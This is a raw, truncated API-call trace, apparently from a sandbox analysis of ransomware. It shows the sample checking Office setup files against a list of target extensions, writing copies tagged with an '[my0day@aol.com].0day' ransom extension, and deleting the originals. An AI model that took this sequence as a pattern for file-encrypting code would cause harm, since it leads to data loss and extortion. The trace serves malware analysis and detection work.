[0039.131] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0039.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.131] lstrlenW (lpString=".doc") returned 4 [0039.132] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".docx") returned 5 [0039.132] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.132] lstrlenW (lpString=".pdf") returned 4 [0039.132] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".xls") returned 4 [0039.132] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".xlsx") returned 5 [0039.132] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.132] lstrlenW (lpString=".ppt") returned 4 [0039.132] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString=".zip") returned 4 [0039.132] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.132] lstrlenW (lpString=".rar") returned 4 [0039.132] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".bz2") returned 4 [0039.132] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".7z") returned 3 [0039.132] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString=".dbf") returned 4 [0039.132] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString=".1cd") returned 4 [0039.132] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString=".jpg") returned 4 [0039.132] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.132] lstrlenW (lpString=".doc") returned 4 [0039.132] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.132] lstrlenW (lpString=".docx") returned 5 [0039.133] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.133] lstrlenW (lpString=".pdf") returned 4 [0039.133] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString=".xls") returned 4 [0039.133] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString=".xlsx") returned 5 [0039.133] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.133] lstrlenW (lpString=".ppt") returned 4 [0039.133] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.133] lstrlenW (lpString=".zip") returned 4 [0039.133] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.133] lstrlenW (lpString=".rar") returned 4 [0039.133] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString=".bz2") returned 4 [0039.133] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString=".7z") returned 3 [0039.133] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.133] lstrlenW (lpString=".dbf") returned 4 [0039.133] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.133] lstrlenW (lpString=".1cd") returned 4 [0039.133] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0039.133] lstrlenW (lpString=".jpg") returned 4 [0039.133] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.133] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0039.133] lstrlenW (lpString="SETUP.CHM") returned 9 [0039.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.658] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=67190) returned 1 [0039.658] CloseHandle (hObject=0x1c4) returned 1 [0039.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20 [0039.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.658] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.658] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.659] GetLastError () returned 0x0 [0039.659] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x10676, lpOverlapped=0x0) returned 1 [0040.060] WriteFile (in: hFile=0x1b0, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0040.062] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.062] WriteFile (in: hFile=0x1b0, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.062] SetEndOfFile (hFile=0x1b0) returned 1 [0040.062] CloseHandle (hObject=0x1b0) returned 1 [0040.064] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.064] SetEndOfFile (hFile=0x1c4) returned 1 [0040.065] CloseHandle (hObject=0x1c4) returned 1 [0040.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.065] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1 [0040.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.065] lstrlenW (lpString=".doc") returned 4 [0040.065] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.065] lstrlenW (lpString=".docx") returned 5 [0040.065] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.065] lstrlenW (lpString=".pdf") returned 4 [0040.065] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.065] lstrlenW (lpString=".xls") returned 4 [0040.065] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".xlsx") returned 5 [0040.066] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.066] lstrlenW (lpString=".ppt") returned 4 [0040.066] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString=".zip") returned 4 [0040.066] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".rar") returned 4 [0040.066] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".bz2") returned 4 [0040.066] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.066] lstrlenW (lpString=".7z") returned 3 [0040.066] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString=".dbf") returned 4 [0040.066] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString=".1cd") returned 4 [0040.066] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString=".jpg") returned 4 [0040.066] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.066] lstrlenW (lpString=".doc") returned 4 [0040.066] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".docx") returned 5 [0040.066] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.066] lstrlenW (lpString=".pdf") returned 4 [0040.066] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".xls") returned 4 [0040.066] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.066] lstrlenW (lpString=".xlsx") returned 5 [0040.066] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.067] lstrlenW (lpString=".ppt") returned 4 [0040.067] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.067] lstrlenW (lpString=".zip") returned 4 [0040.067] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.067] lstrlenW (lpString=".rar") returned 4 [0040.067] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.067] lstrlenW (lpString=".bz2") returned 4 [0040.067] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.067] lstrlenW (lpString=".7z") returned 3 [0040.067] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.067] lstrlenW (lpString=".dbf") returned 4 [0040.067] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.067] lstrlenW (lpString=".1cd") returned 4 [0040.067] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.067] lstrlenW (lpString=".jpg") returned 4 [0040.067] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.067] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.067] lstrlenW (lpString="SETUP.XML") returned 9 [0040.067] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.119] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1988) returned 1 [0040.121] CloseHandle (hObject=0x1f8) returned 1 [0040.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20 [0040.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.137] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.137] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.147] GetLastError () returned 0x0 [0040.147] ReadFile (in: hFile=0x204, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0040.184] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0040.185] ReadFile (in: hFile=0x204, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.185] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.185] SetEndOfFile (hFile=0x208) returned 1 [0040.185] CloseHandle (hObject=0x208) returned 1 [0040.186] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.186] SetEndOfFile (hFile=0x204) returned 1 [0040.187] CloseHandle (hObject=0x204) returned 1 [0040.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.187] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0040.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.187] lstrlenW (lpString=".doc") returned 4 [0040.187] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.187] lstrlenW (lpString=".docx") returned 5 [0040.187] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.187] lstrlenW (lpString=".pdf") returned 4 [0040.187] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.187] lstrlenW (lpString=".xls") returned 4 [0040.187] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.187] lstrlenW (lpString=".xlsx") returned 5 [0040.187] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.187] lstrlenW (lpString=".ppt") returned 4 [0040.187] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.187] lstrlenW (lpString=".zip") returned 4 [0040.188] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.188] lstrlenW (lpString=".rar") returned 4 [0040.188] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString=".bz2") returned 4 [0040.188] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString=".7z") returned 3 [0040.188] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString=".dbf") returned 4 [0040.188] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString=".1cd") returned 4 [0040.188] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString=".jpg") returned 4 [0040.188] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString=".doc") returned 4 [0040.188] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString=".docx") returned 5 [0040.188] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.188] lstrlenW (lpString=".pdf") returned 4 [0040.188] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString=".xls") returned 4 [0040.188] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString=".xlsx") returned 5 [0040.188] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.188] lstrlenW (lpString=".ppt") returned 4 [0040.188] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.188] lstrlenW (lpString=".zip") returned 4 [0040.188] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.188] lstrlenW (lpString=".rar") returned 4 [0040.189] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.189] lstrlenW (lpString=".bz2") returned 4 [0040.189] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.189] lstrlenW (lpString=".7z") returned 3 [0040.189] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.189] lstrlenW (lpString=".dbf") returned 4 [0040.189] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.189] lstrlenW (lpString=".1cd") returned 4 [0040.189] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.189] lstrlenW (lpString=".jpg") returned 4 [0040.189] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.189] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.189] lstrlenW (lpString="Proof.XML") returned 9 [0040.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.199] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1457) returned 1 [0040.199] CloseHandle (hObject=0x204) returned 1 [0040.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20 [0040.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.200] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.200] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.200] GetLastError () returned 0x0 [0040.200] ReadFile (in: hFile=0x204, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0040.209] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, 